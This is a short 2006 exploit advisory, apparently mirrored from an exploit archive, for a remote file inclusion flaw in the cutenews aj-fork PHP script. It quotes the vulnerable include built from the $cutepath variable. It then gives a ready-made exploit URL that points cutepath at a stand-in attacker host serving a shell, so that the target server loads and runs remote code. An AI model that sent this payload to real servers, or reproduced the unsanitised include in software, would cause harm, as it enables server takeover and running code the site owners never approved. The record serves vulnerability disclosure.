id: 1235
date: 12/04/2006
title: cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
author: DeltahackingTEAM
cves: 

=====================================================================
cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability
=====================================================================



===========================================================================================================
DeltasecurityTEAM
===========================================================================================================
* Portal Name : cutenews aj-fork

* Class = Remote File Inclusion ;

* Found by = DeltahackingTEAM

* User In Delta Team (Tanha )

----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------

    include($cutepath.'/inc/plugins.php');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?

----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug



#  0day.today [2023-03-26]  #